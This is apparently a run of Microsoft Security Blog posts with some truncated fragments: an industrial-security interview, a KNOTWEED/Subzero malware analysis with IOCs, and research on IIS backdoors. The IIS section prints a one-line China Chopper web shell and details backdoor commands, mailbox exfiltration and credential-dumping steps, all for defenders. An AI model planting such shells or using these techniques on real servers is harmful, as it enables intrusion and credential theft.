Our security teams around the world focus on identifying and mitigating security issues as soon as possible while minimizing customer disruption. One of the challenges of a traditional security update is ensuring customers apply the protections promptly. We recently discussed the work that goes into these updates in The Anatomy of a Security update. Cloud …
The security community is continuously changing, growing, and learning from each other to better position the world against cyberthreats. In the latest post of our Community Voices blog series, Microsoft Security Senior Product Marketing Manager Brooke Lynn Weenig talks with Patrick C. Miller, Chief Executive Officer (CEO) and owner of Ampere Industrial Security and the founder and former Director of the Energy Sector Security Consortium. The thoughts below reflect Patrick’s views, not the views of Patrick’s employer, and are not legal advice. In this blog post, Patrick talks about security and hiring challenges in the industrial security industry.
Brooke: How did you get into industrial security?
Patrick: My dad was in telecommunications, so I grew up with a wire in one hand and a flashlight in my teeth, crawling down dark holes full of asbestos and dust and running wires. I built a lot of analog phone systems, and even had a pair of pole spikes, a test set, and a hard hat. I have done everything from climbing poles and stringing line to wiring building-size main distribution frames (MDFs). I was a phone tech who programmed phone systems for most of my younger days. I had done a lot of the security components on the telecom side. Back then, there were a lot of things like long-distance fraud and voicemail access that had to be secure.
I was going to school for biology, with a focus on the botany and microbiology side, when I got a chance to touch the supervisory control and data acquisition (SCADA), operational technology (OT), and industrial control system (ICS) environments as a side job. I was working as a propagation manager for an exceptionally large commercial greenhouse operation, using my biology skills and doing technical stuff. I merged them together and automated a bunch of horticulture warehouse operations, including light, shade, temperature, water, and airflow management. That is where I got my toe in the water of programming and building in industrial environments.
Brooke: How did you grow your skills in the industrial security world?
Patrick: There were no security certificates or college courses in the late 1980s and early 1990s. I fell backward into operational security because of incident response. We had things like bulletin board systems. I had one of the first dial-up modems, and I would go through my university account and look up how to do something. I learned primarily through 2600: The Hacker Quarterly and hands-on success or failure from whatever tutorials were available back then.
Now, I specialize in ICS or OT. Whether it is water in a pipe, power on a wire, traffic on the street, boxes on a belt—it is all flow control. It is incredibly challenging but also very satisfying. At the end of the day, you know you helped keep the lights on, keep the water flowing, keep the gas moving, whatever it may be. Those are critical infrastructures.
Brooke: Why are industrial systems targeted in cyberattacks?
Patrick: Gas, water, electricity, food processing, and transportation are all very necessary. Civilization depends on these infrastructure services. If I am a ransomware operator or a criminal, I can hold your system hostage and since you know there is a quick and severe impact, there is a high likelihood you are going to pay me. They are a high-value target from a criminal aspect as well as from a nation-state or geopolitical perspective for the same reasons but different motivations.
Proprietary information is a target as well. If you have some product or manufacturing or a better way of doing something, I do not have to do the research and development (R&D) to compete with you. I can just steal all your data and do what you do better because I am not spending all the money on R&D and effort. For lots of varied reasons, they are high-value targets.
Brooke: What are the biggest challenges in securing industrial systems?
Patrick: With industrial systems, our biggest worry is our legacy environment because it is just old. Some of the components have been around 40 to 50 years. They are digital-ish and they have analog inputs, but they were not designed to be networked. They were designed to be in a closed system where you had to have physical access to them, but we networked them anyway. They are terribly insecure because the expectation was that these environments would never connect to anything else.
We are seeing a trend to not necessarily disconnect them, but rather connect them in smarter ways. And if you need access to these environments, you must jump through enormous amounts of pain to get an inbound connection. We are just isolating the heck out of it and finding ways to intelligently island or “turtle-mode” those environments so they can operate by themselves. That way, if you have a problem, you can still run the important stuff in an isolated, disconnected mode and you do not lose power, water, gas, or whatever it may be.
If there’s ransomware burning through your corporate environment, you can take your industrial environment and shut it off from the outside world so it can operate in “turtle mode.” However, costs go up. Isolation is expensive and extra architecture is expensive. There are a ton of challenges, both financially and operationally, in trying to move toward a more defendable architecture than we had.
Brooke: What else can enterprises do to protect themselves from these security risks?
Patrick: I have done multiple presentations on if you can only do some things, do these things. They may sound simple, but they are often not easily done in industrial environments:
Brooke: How can industrial security leaders attract more talent?
Patrick: I do not think there is a skills gap. There are a lot of people out there who would do and can do this job if we figure out how to characterize it well. You do not need to be a programmer or a cybersecurity expert to learn this stuff. It involves systems, connected in certain ways, and doing things in very methodical and predictable methods. It is not something outside the norm for most technical minds.
I typically see no entry-level path to get people into the industry. Your expectation is you are going to hire somebody who is a junior and needs 5 to 10 years of experience even as a junior. A lot of these job descriptions are entirely unrealistic. I see job descriptions where they are asking for more experience on a platform than that platform has existed. There are a lot of people you could get who have basic skills and you train them for a week or two. They are going to be hungry to show you what they can do and just grow from there.
Brooke: What skills do industry security professionals need to be successful?
Patrick: Industrial security sounds harder than it really is. When I train people, we break it down into these simple, bite-sized pieces and little breadcrumbs of steps. At the end of the day, they say, “Wow, that was way simpler than I had thought it was.” There is this mysterious cloud about cybersecurity, but it is just lots of small parts. You just must learn what all the parts are and what the acronyms are. Once it is described in a real-world kind of application, most people pick it up quickly.
Most of it is they must be curious enough. Empathy is another because to secure a system, you must have some empathy for what you are doing and why it is important. In the IT and OT world, you have engineering folks, and they just want the thing to work. If there is an alarm going off on their screen and they must react and click something, they do not want their screen to lock them out so they cannot click that button, which in some cases could cause the plant to have big problems. You must have enough empathy for their situation and what they need, and then, as a security professional, design around that so they can still have those things but in a more secure way. If you can be detail-oriented and have strong curiosity and empathy, you can succeed in this space.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
The post Industrial systems: What it takes to secure and staff them appeared first on Microsoft Security Blog.
Our security teams around the world focus on identifying and mitigating security issues as soon as possible while minimizing customer disruption.
One of the challenges of a traditional security update is ensuring customers apply the protections promptly. We recently discussed the work that goes into these updates in The Anatomy of a Security update.
本ブログは、Anatomy of a Cloud-Service Security Update の抄訳版です。最新の情報は原文を参照してください。 世界中のマイク
The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a private-sector offensive actor (PSOA) using multiple Windows and Adobe 0-day exploits, including one for the recently patched CVE-2022-22047, in limited and targeted attacks against European and Central American customers. The PSOA, which MSTIC tracks as KNOTWEED, developed malware called Subzero which was used in these attacks.
This blog details Microsoft’s analysis of the observed KNOTWEED activity and related malware used in targeted attacks against our customers. This information is shared with our customers and industry partners to improve detection of these attacks. Customers are encouraged to expedite deployment of the July 2022 Microsoft security updates to protect their systems against exploits using CVE-2022-22047. Microsoft Defender Antivirus and Microsoft Defender for Endpoint have also implemented detections against KNOTWEED’s malware and tools.
PSOAs, which Microsoft also refers to as cyber mercenaries, sell hacking tools or services through a variety of business models. Two common models for this type of actor are access-as-a-service and hack-for-hire. In access-as-a-service, the actor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any targeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the actor, who then runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that KNOTWEED may blend these models: they sell the Subzero malware to third parties but have also been observed using KNOTWEED-associated infrastructure in some attacks, suggesting more direct involvement.
KNOTWEED is an Austria-based PSOA named DSIRF. The DSIRF website [web archive link] says they provide services “to multinational corporations in the technology, retail, energy and financial sectors” and that they have “a set of highly sophisticated techniques in gathering and analyzing information.” They publicly offer several services including “an enhanced due diligence and risk analysis process through providing a deep understanding of individuals and entities” and “highly sophisticated Red Teams to challenge your company’s most critical assets.”
However, multiple news reports have linked DSIRF to the development and attempted sale of a malware toolset called Subzero. MSTIC found the Subzero malware being deployed through a variety of methods, including 0-day exploits in Windows and Adobe Reader, in 2021 and 2022. As part of our investigation into the utility of this malware, Microsoft’s communications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and confirmed that it was unauthorized, malicious activity. Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama. It’s important to note that the identification of targets in a country doesn’t necessarily mean that a DSIRF customer resides in the same country, as international targeting is common.
MSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks. These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF.
MSTIC found KNOTWEED’s Subzero malware deployed in a variety of ways. In the succeeding sections, the different stages of Subzero are referred to by their Microsoft Defender detection names: Jumplump for the persistent loader and Corelump for the main malware.
In May 2022, MSTIC found an Adobe Reader remote code execution (RCE) and a 0-day Windows privilege escalation exploit chain being used in an attack that led to the deployment of Subzero. The exploits were packaged into a PDF document that was sent to the victim via email. Microsoft was not able to acquire the PDF or Adobe Reader RCE portion of the exploit chain, but the victim’s Adobe Reader version was released in January 2022, meaning that the exploit used was either a 1-day exploit developed between January and May, or a 0-day exploit. Based on KNOTWEED’s extensive use of other 0-days, we assess with medium confidence that the Adobe Reader RCE is a 0-day exploit. The Windows exploit was analyzed by MSRC, found to be a 0-day exploit, and then patched in July 2022 as CVE-2022-22047. Interestingly, there were indications in the Windows exploit code that it was also designed to be used from Chromium-based browsers, although we’ve seen no evidence of browser-based attacks.
The CVE-2022-22047 vulnerability is related to an issue with activation context caching in the Client Server Run-Time Subsystem (CSRSS) on Windows. At a high level, the vulnerability could enable an attacker to provide a crafted assembly manifest, which would create a malicious activation context in the activation context cache, for an arbitrary process. This cached context is used the next time the process spawned.
CVE-2022-22047 was used in KNOTWEED related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes (with some caveats, as discussed below) and achieve system-level code execution. The exploit chain starts with writing a malicious DLL to disk from the sandboxed Adobe Reader renderer process. The CVE-2022-22047 exploit was then used to target a system process by providing an application manifest with an undocumented attribute that specified the path of the malicious DLL. Then, when the system process next spawned, the attribute in the malicious activation context was used, the malicious DLL was loaded from the given path, and system-level code execution was achieved.
It’s important to note that exploiting CVE-2022-22047 requires attackers to be able to write a DLL to disk. However, in the threat model of sandboxes, such as that of Adobe Reader and Chromium, the ability to write out files where the attacker cannot control the path isn’t considered dangerous. Hence, these sandboxes aren’t a barrier to the exploitation of CVE-2022-22047.
In 2021, MSRC received a report of two Windows privilege escalation exploits (CVE-2021-31199 and CVE-2021-31201) being used in conjunction with an Adobe Reader exploit (CVE-2021-28550), all of which were patched in June 2021. MSTIC was able to confirm the use of these in an exploit chain used to deploy Subzero.
We were later able to link the deployment of Subzero to a fourth exploit, one related to a Windows privilege escalation vulnerability in the Windows Update Medic Service (CVE-2021-36948), which allowed an attacker to force the service to load an arbitrary signed DLL. The malicious DLL used in the attacks was signed by ‘DSIRF GmbH’.
In addition to the exploit chains, another method of access that led to the deployment of Subzero was an Excel file masquerading as a real estate document. The file contained a malicious macro that was obfuscated with large chunks of benign comments from the Kama Sutra, string obfuscation, and use of Excel 4.0 macros.
After de-obfuscating strings at runtime, the VBA macro uses the ExecuteExcel4Macro function to call native Win32 functions to load shellcode into memory allocated using VirtualAlloc. Each opcode is individually copied into a newly allocated buffer using memset before CreateThread is called to execute the shellcode.
The following section describes the shellcode executed by the macro.
The downloader shellcode is the initial shellcode executed from either the exploit chains or malicious Excel documents. The shellcode’s purpose is to retrieve the Corelump second-stage malware from the actor’s command-and-control (C2) server. The downloader shellcode downloads a JPEG image that contains extra encrypted data appended to the end of the file (past the 0xFF 0xD9 marker that signifies the end of a JPEG file). The JPEG is then written to the user’s %TEMP% directory.
The downloader shellcode searches for a 16-byte marker immediately following the end of JPEG. After finding the marker, the downloader shellcode RC4 decrypts the loader shellcode using the next 16 bytes as the RC4 key. Finally, the loader shellcode RC4 decrypts the Corelump malware using a second RC4 key and manually loads it into memory.
Corelump is the main payload and resides exclusively in memory to evade detection. It contains a variety of capabilities including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from KNOTWEED’s C2 server.
As part of installation, Corelump makes copies of legitimate Windows DLLs and overwrites sections of them with malicious code. As part of this process, Corelump also modifies the fields in the PE header to accommodate the nefarious changes, such as adding new exported functions, disabling Control Flow Guard, and modifying the image file checksum with a computed value from CheckSumMappedFile. These trojanized binaries (Jumplump) are dropped to disk in C:\Windows\System32\spool\drivers\color\, and COM registry keys are modified for persistence (see the Behaviors section for more information on COM hijacking).
Jumplump is responsible for loading Corelump into memory from the JPEG file in the %TEMP% directory. If Corelump is not present, Jumplump attempts to download it again from the C2 server. Both Jumplump and the downloader shellcode are heavily obfuscated to make analysis difficult, with most instructions being followed by a jmp to another instruction/jmp combination, giving a convoluted control flow throughout the program.
KNOTWEED was also observed using the bespoke utility tools Mex and PassLib. These tools are developed by KNOTWEED and bear capabilities that are derived from publicly available sources. Mex, for example, is a command-line tool containing several red teaming or security plugins copied from GitHub (listed below):
| Chisel | mimikatz | SharpHound3 |
| Curl | Ping Castle | SharpOxidResolver |
| Grouper2 | Rubeus | PharpPrinter |
| Internal Monologue | SCShell | SpoolSample |
| Inveigh | Seatbelt | StandIn |
| Lockless | SharpExec |
PassLib is a custom password stealer tool capable of dumping credentials from a variety of sources including web browsers, email clients, LSASS, LSA secrets, and the Windows credential manager.
In victims where KNOTWEED malware had been used, a variety of post-compromise actions were observed:
Pivoting off a known command-and-control domain identified by MSTIC, acrobatrelay[.]com, RiskIQ expanded the view of KNOTWEED’s attack infrastructure. Leveraging unique patterns in the use of SSL certificates and other network fingerprints specific to the group and associated with that domain, RiskIQ identified a host of additional IP addresses under the control of KNOTWEED. This infrastructure, largely hosted by Digital Ocean and Choopa, has been actively serving malware since at least February of 2020 and continues through the time of this writing.
RiskIQ next utilized passive DNS data to determine which domains those IPs resolved to at the time they were malicious. This process yielded several domains with direct links to DSIRF, including demo3[.]dsirf[.]eu (the company’s own website), and several subdomains that appear to have been used for malware development, including debugmex[.]dsirflabs[.]eu (likely a server used for debugging malware with the bespoke utility tool Mex) and szstaging[.]dsirflabs[.]eu (likely a server used to stage Subzero malware).
Microsoft will continue to monitor KNOTWEED activity and implement protections for our customers. The current detections and IOCs detailed below are in place and protecting Microsoft customers across our security products. Additional advanced hunting queries are also provided below to help organizations extend their protections and investigations of these attacks.
Corelump drops the Jumplump loader DLLs to C:\Windows\System32\spool\drivers\color\. This is a common directory used by malware as well as some legitimate programs, so writes of PE files to the folder should be monitored.
Jumplump uses COM hijacking for persistence, modifying COM registry keys to point to the Jumplump DLL in C:\Windows\System32\spool\drivers\color\. Modifications of default system CLSID values should be monitored to detect this technique (e.g., HKLM\SOFTWARE\Classes\CLSID\{GUID}\InProcServer32 Default value). The five CLSIDs used by Jumplump are listed below with their original clean values on Windows 11:
Many of the post-compromise actions can be detected based on their command lines. Customers should monitor for possible malicious activity such as PowerShell executing scripts from internet locations, modification of commonly abused registry keys such as HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, and LSASS credential dumping via minidumps.
The techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the security considerations provided below:
The following list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems. All sample hashes are available in VirusTotal.
| Indicator | Type | Description |
|---|---|---|
| 78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629 | SHA-256 | Malicious Excel document and VBA |
| 0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f | SHA-256 | Malicious Excel document and VBA |
| 441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964 | SHA-256 | Jumplump malware |
| cbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b | SHA-256 | Jumplump malware |
| fd6515a71530b8329e2c0104d0866c5c6f87546d4b44cc17bbb03e64663b11fc | SHA-256 | Jumplump malware |
| 5d169e083faa73f2920c8593fb95f599dad93d34a6aa2b0f794be978e44c8206 | SHA-256 | Jumplump malware |
| 7f29b69eb1af1cc6c1998bad980640bfe779525fd5bb775bc36a0ce3789a8bfc | SHA-256 | Jumplump malware |
| 02a59fe2c94151a08d75a692b550e66a8738eb47f0001234c600b562bf8c227d | SHA-256 | Jumplump malware |
| 7f84bf6a016ca15e654fb5ebc36fd7407cb32c69a0335a32bfc36cb91e36184d | SHA-256 | Jumplump malware |
| afab2e77dc14831f1719e746042063a8ec107de0e9730249d5681d07f598e5ec | SHA-256 | Jumplump malware |
| 894138dfeee756e366c65a197b4dbef8816406bc32697fac6621601debe17d53 | SHA-256 | Jumplump malware |
| 4611340fdade4e36f074f75294194b64dcf2ec0db00f3d958956b4b0d6586431 | SHA-256 | Jumplump malware |
| c96ae21b4cf2e28eec222cfe6ca903c4767a068630a73eca58424f9a975c6b7d | SHA-256 | Corelump malware |
| fa30be45c5c5a8f679b42ae85410f6099f66fe2b38eb7aa460bcc022babb41ca | SHA-256 | Mex tool |
| e64bea4032cf2694e85ede1745811e7585d3580821a00ae1b9123bb3d2d442d6 | SHA-256 | Passlib tool |
| acrobatrelay[.]com | Domain | C2 |
| finconsult[.]cc | Domain | C2 |
| realmetaldns[.]com | Domain | C2 |
NOTE: These indicators should not be considered exhaustive for this observed activity.
Microsoft Defender Antivirus detects the malware tools and implants used by KNOTWEED starting with signature build 1.371.503.0 as the following family names:
Microsoft Defender for Endpoint customers may see the following alerts as an indication of a possible attack. These alerts are not necessarily an indication of KNOTWEED compromise:
The following resources are available to Microsoft Sentinel customers to identify the activity outlined in the blog post.
Microsoft Defender Antivirus detections related to KNOTWEED
This query identifies occurrences of Microsoft Defender Antivirus detections listed in this blog post:
File hash IOCs related to KNOTWEED
This query identifies matches based on file hash IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:
Domain IOCs related to KNOTWEED
This query identifies matches based on domain IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:
COM registry key modified to point to Color Profile folder
This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\:
PE file dropped in Color Profile folder
This query looks for PE files being created in the C:\Windows\System32\spool\drivers\color\ folder:
Abnormally large JPEG downloaded from new source
This query looks for downloads of JPEG files from remote sources, where the file size is abnormally large, and not from a common source:
Downloading new file using Curl
This query looks for new files being downloaded using Curl.
Suspected credential dumping
This query looks for attackers using comsvcs.dll to dump credentials from memory
Downgrade to plaintext credentials
This query looks for registry key being set to enabled plain text credentials
Microsoft 365 Defender customers can run the following advanced hunting queries to locate IOCs and related malicious activity in their environments.
Microsoft Defender Antivirus detections related to KNOTWEED
This query identifies detection of related malware and tools by Microsoft Defender Antivirus:
File hash IOCs related to KNOTWEED
This query surfaces KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables:
Domain IOCs related to KNOTWEED
This query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections:
COM registry key modified to point to Color Profile folder
This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\:
PE file dropped in Color Profile folder
This query looks for PE files being created in the C:\Windows\System32\spool\drivers\color\ folder:
Downloading new file using Curl
This query looks for new files being downloaded using Curl.
The post Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits appeared first on Microsoft Security Blog.
Attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers, which hide deep in target environments and provide a durable persistence mechanism for attackers. While prior research has been published on specific incidents and variants, little is generally known about how attackers leverage the IIS platform as a backdoor.
Malicious IIS extensions are less frequently encountered in attacks against servers, with attackers often only using script web shells as the first stage payload. This leads to a relatively lower detection rate for malicious IIS extensions compared to script web shells. IIS backdoors are also harder to detect since they mostly reside in the same directories as legitimate modules used by target applications, and they follow the same code structure as clean modules. In most cases, the actual backdoor logic is minimal and cannot be considered malicious without a broader understanding of how legitimate IIS extensions work, which also makes it difficult to determine the source of infection.
Typically, attackers first exploit a critical vulnerability in the hosted application for initial access before dropping a script web shell as the first stage payload. At a later point in time, the attackers then install an IIS backdoor to provide highly covert and persistent access to the server. Attackers can also install customized IIS modules to fit their purposes, as we observed in a campaign targeting Exchange servers between January and May 2022, as well as in our prior research on the custom IIS backdoors ScriptModule.dll and App_Web_logoimagehandler.ashx.b6031896.dll. Once registered with the target application, the backdoor can monitor incoming and outgoing requests and perform additional tasks, such as running remote commands or dumping credentials in the background as the user authenticates to the web application.
As we expect attackers to continue to increasingly leverage IIS backdoors, it’s vital that incident responders understand the basics of how these attacks function to successfully identify and defend against them. Organizations can further improve their defenses with Microsoft 365 Defender, whose protection capabilities are informed by research like this and our unique visibility into server attacks and compromise. With critical protection features like threat and vulnerability management and antivirus capabilities, Microsoft 365 Defender provides organizations with a comprehensive solution that coordinates protection across domains, spanning email, identities, cloud, and endpoints.
In this blog post, we detail how IIS extensions work and provide insight into how they are being leveraged by attackers as backdoors. We also share some of our observations on the IIS threat landscape over the last year to help defenders identify and protect against this threat and prepare the larger security community for any increased sophistication. More specifically, the blog covers the following topics:
IIS is a flexible, general purpose web server that has been a core part of the Windows platform for many years now. As an easy-to-manage, modular, and extensible platform for hosting websites, services, and applications, IIS serves critical business logic for numerous organizations. The modular architecture of IIS allows users to extend and customize web servers according to their needs. These extensions can be in the form of native (C/C++) and managed (C#, VB.NET) code structures, with the latter being our focus on this blog post. The extensions can further be categorized as modules and handlers.
The IIS pipeline is a series of extensible objects that are initiated by the ASP.NET runtime to process a request. IIS modules and handlers are .NET components that serve as the main points of extensibility in the pipeline. Each request is processed by multiple IIS modules before being processed by a single IIS handler. Like a set of building blocks, modules and handlers are added to provide the desired functionality for the target application. In addition, handlers can be configured to respond to specific attributes in the request such a URL, file extension, and HTTP method. For example, Aspnet_isapi.dll is a pre-configured IIS handler for common .aspx extensions.
To create a managed IIS module, the code must implement the IHttpModule interface. The IHttpModule interface has two methods with the following signatures: Init() and Dispose().
Inside Init(), the module can synchronize with any number of HTTP events available in the request pipeline, listed here in sequential order:
The newly created extension should then be mapped with the target application to complete the registration. Generally, there are several methods that can be used to map managed modules for legitimate purposes. On the other hand, we observed that attackers used the following techniques to register malicious IIS extensions during attacks:
Register with global assembly cache (GAC) PowerShell API: Every device with Common Language Runtime (CLR) hosts a device-wide cache called the global assembly cache (GAC). The GAC stores assemblies specifically designated to be shared by several applications on the device. GacInstall() is a PowerShell API to add modules into the global cache. Once installed, the module is available under the path %windir%\Microsoft.NET\assembly and is mapped to IIS (w3wp.exe) using appcmd.exe.
Register using appcmd.exe: Appcmd.exe is the single command line tool for managing IIS. All critical aspects, such as adding or removing modules and handlers, can be performed using the utility. In this case, the attackers drop the malicious extension in the target application’s /bin folder and map it using the add module command.
Register using gacutil.exe: Gacutil.exe is a Visual Studio shipped .NET GAC utility. The tool allows the user to view and manipulate the contents of the GAC, including installing new modules using the -I option.
Register using web.config: After dropping the module in the application’s /bin folder, attackers can also edit the web.config of the target application or the global config file, applicationHost.config, to register the module.
Upon successful registration, the module is visible inside the IIS manager application.
Between January and May 2022, our IIS-related detections picked up an interesting campaign targeting Microsoft Exchange servers. Web shells were dropped in the path %ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\ via ProxyShell exploit.
After a period of doing reconnaissance, dumping credentials, and establishing a remote access method, the attackers installed a custom IIS backdoor called FinanceSvcModel.dll in the folder C:\inetpub\wwwroot\bin\. The backdoor had built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration, as detailed below.
PowerShDLL toolkit, an open-source project to run PowerShell without invoking powershell.exe, was used to run remote commands. The attacker avoided invoking common living-off-the-land binaries (LOLBins), such as cmd.exe or powershell.exe in the context of the Exchange application pool (MSExchangeOWAAppPool) to evade related detection logic.
The attackers enabled WDigest registry settings, which forced the system to use WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user’s plaintext password in memory. This change allowed the attackers to steal the actual password, not just the hash. Later, Mimikatz was run to dump local credentials and perform a DCSYNC attack.
The attackers used plink.exe, a command-line connection tool like SSH. The tool allowed the attackers to bypass network restrictions and remotely access the server through tunneled RDP traffic.
The attacker invoked the IIS backdoor by sending a crafted POST request with a cookie EX_TOKEN. The module extracts the cookie value and initiates a mailbox export request with the supplied filter.
The value decodes to: ep,06/21/2022,06/21/2022,C:\Windows\Web,Administrator, where ep is the command to initiate the mailbox export request with filters determining the start and end dates followed by the export path. The final command has the following syntax:
The table below details all the commands found in the backdoor:
| Command | Description |
| test | Attempts to load Exchange Management Shell (EMS)- Add-PSSnapin Microsoft.Exchange.Management.Powershell.SnapIn |
| box | List all UserPrincipalNames- foreach ($name in Get-Mailbox -ResultSize unlimited){ Write-Output $name.UserPrincipalName} |
| ep | Run New-MailboxExportRequest cmdlet with supplied mailbox name, start and end date, and export path as filters. |
| gep | Get the task ID associated with the export request |
| ruh | Tamper with Exchange logs |
Reviewing the malicious managed (.NET) IIS extensions observed over the past year, we grouped these extensions based on various factors such as similar capabilities and sources of origin, as further detailed in the below sections.
Web shells like China Chopper have been widely used in numerous targeted attacks. As China Chopper’s usage increased over the years, so did the detections. As a result, the attackers evolved and added IIS module-based versions of these web shells that maintain the same functionality. The module uses the same eval() technique that’s used in the script version for running the code. While most antivirus solutions would detect the one-liner web shell, such as < %@page language=js%><%eval(request.item(<password>),”unsafe”);%>, embedding the same code in an IIS module generates lower detection rates.
In the module version, the attacker-initiated POST request contains the code along with the arguments in parameters z1 and z2, like the script-based version.
In a different version, the module has the backdoor logic hardcoded inside the DLL and only waits for parameters z1 and z2. The parameter kfaero has the command exposed as sequential alphabets from ‘A-Q’.
Like the script version, the IIS module has similar capabilities, such as listing and creating directories, downloading and uploading files, running queries using SQL adaptors, and running commands. To run commands, the attacker-initiated POST request contains the command “M” along with the arguments.
Antsword is another popular web shell widely used in various targeted attacks. Custom IIS modules inspired from the web shell’s code have been observed in the wild, which include similar architecture and capabilities. Interesting new features of these malicious modules include fileless execution of C# code and remote access via TCP socket connection.
Based on the request, the module can take one of the two code paths. In case of /server-status, a socket connection is initiated from values in the custom header Lhposzrp.
| Command | Description |
| FSoaij7_03Ip3QuzbIhvuilKIsoM9a48DTkvQKdwtKNA | Socket connection |
| 8CDztbQb4fsQeU5AAuBs9OmRokoyFJ7F5Z | Close connection |
| 31FKvk8VDcqZMA3iAq3944wjg | Send data |
| TU_LDzOsv | Receive data |
For any other URL, the module follows a China Chopper-style architecture of commands, ranging from “A” through “R”. The additional “R” command allows the attackers to run C# code reflectively.
GitHub projects on creating backdoors for IIS have been available for some time now. Though mostly shared to educate the red team community, threat actors have also taken interest and lifted code from these projects. Using a public project that has been actively leveraged by attackers as an example, the original code includes the following capabilities:
| Command | Implementation |
| cmd | Run command via cmd.exe /c |
| powershell | Run powershell via RunspaceFactory.CreateRunspace() |
| shellcode | Inject supplied shellcode into userinit.exe |
In this case, the in-the-wild variants change the cookie names, keeping the rest of the code intact:
On supplying a whoami command to the backdoor, the generated cookie has the following format:
Cookie: BDUSS=P6zUsk/1xJyW4PPufWsx5w==
The backdoor responds with an AES encrypted blob wrapped in base64. The decoded output has the following format:
As mentioned earlier, IIS handlers have the same visibility as modules into the request pipeline. Handlers can be configured to respond to certain extensions or requests. To create a managed IIS handler, the code must implement the IHttpHandler interface. The IHttpHandler interface has one method and one property with the following signatures:
Handlers can be registered by directly editing the web.config file or using the appcmd utility. The handler config takes a few important fields like path, which specifies the URL or extensions the handler should respond to, and verb, which specifies the HTTP request type. In the example below, the handler only responds to image requests ending with a .gif extension:
The handler is visible in the IIS manager application once successfully installed:
Most of the handlers analyzed were relatively simple, only including the capability to run commands:
Interestingly, the response Content-Type is set to image/gif or image/jpeg, which presents a default image when browsing the image URL with the output hidden in <pre> tags. A possible reason for this could be to bypass network inspection since image files are generally considered non-malicious and are filtered and identified based on extensions.
This subset of modules monitors sign-in patterns in outgoing requests and dumps extracted credentials in an encrypted format. The stolen credentials allow the attackers to remain persistent in the environment, even if the primary backdoor is detected.
The modules monitor for specific requests to determine a sign-in activity, such as /auth.owa default URL for OWA application. On inspecting the request, the module dumps the credentials in a .dat file. The contents are encrypted using XOR with a hardcoded value and wrapped with base64 encoding. The below image depicts a decoded sample output:
In another variant, the module looks for common placeholder variables for passing credentials used in different ASP.Net applications. The dumped credentials are AES encrypted and wrapped with Base64 encoding, located in %programdata%\log.txt.
As we expect to observe more attacks using IIS backdoors, organizations must ensure to follow security practices to help defend their servers.
Identify and remediate vulnerabilities or misconfigurations impacting servers. Deploy the latest security updates, especially for server components like Exchange as soon as they become available. Use Microsoft Defender Vulnerability Management to audit these servers regularly for vulnerabilities, misconfigurations, and suspicious activity.
It’s critical to protect servers with Windows antivirus software and other security solutions like firewall protection and MFA. Turn on cloud-delivered protection and automatic sample submission in Microsoft Defender Antivirus to use artificial intelligence and machine learning to quickly identify and stop new and unknown threats. Use attack surface reduction rules to automatically block behaviors like credential theft and suspicious use of PsExec and Windows Management Instrumentation (WMI). Turn on tamper protection features to prevent attackers from stopping security services.
If you are worried that these security controls will affect performance or disrupt operations, engage with IT professionals to help determine the true impact of these settings. Security teams and IT professionals should collaborate on applying mitigations and appropriate settings.
Review highly privileged groups like Administrators, Remote Desktop Users, and Enterprise Admins. Attackers add accounts to these groups to gain foothold on a server. Regularly review these groups for suspicious additions or removal. To identify Exchange-specific anomalies, review the list of users in sensitive roles such as mailbox import export and Organization Management using the Get-ManagementRoleAssignment cmdlet in Exchange PowerShell.
Practice the principle of least-privilege and maintain good credential hygiene. Avoid the use of domain-wide, admin-level service accounts. Enforce strong randomized, just-in-time local administrator passwords and enable MFA. Use tools like Microsoft Defender for Identity’s Local Administrator Password Solution (LAPS).
Place access control list restrictions on virtual directories in IIS. Also, remove the presence of on-premises Exchange servers when only used for recipient management in Exchange Hybrid environments.
The distinctive patterns of server compromise aid in detecting malicious behaviors and inform security operations teams to quickly respond to the initial stages of compromise. Pay attention to and immediately investigate alerts indicating suspicious activities on servers. Catching attacks in the exploratory phase, the period in which attackers spend several days exploring the environment after gaining access, is key. Prioritize alerts related to processes such as net.exe, cmd.exe originating from w3wp.exe in general.
Regularly inspect web.config of your target application and ApplicationHost.config to identify any suspicious additions, such as a handler for image files—which is suspicious itself, if not outright malicious. Also, regularly scan installed paths like the application’s bin directory and default GAC location. Regularly inspecting the list of installed modules using the appcmd.exe or gacutil.exe utilities is also advisable.
Hardik Suri
Microsoft 365 Defender Research Team
Microsoft Defender Antivirus detects these threats and related behaviors as the following malware:
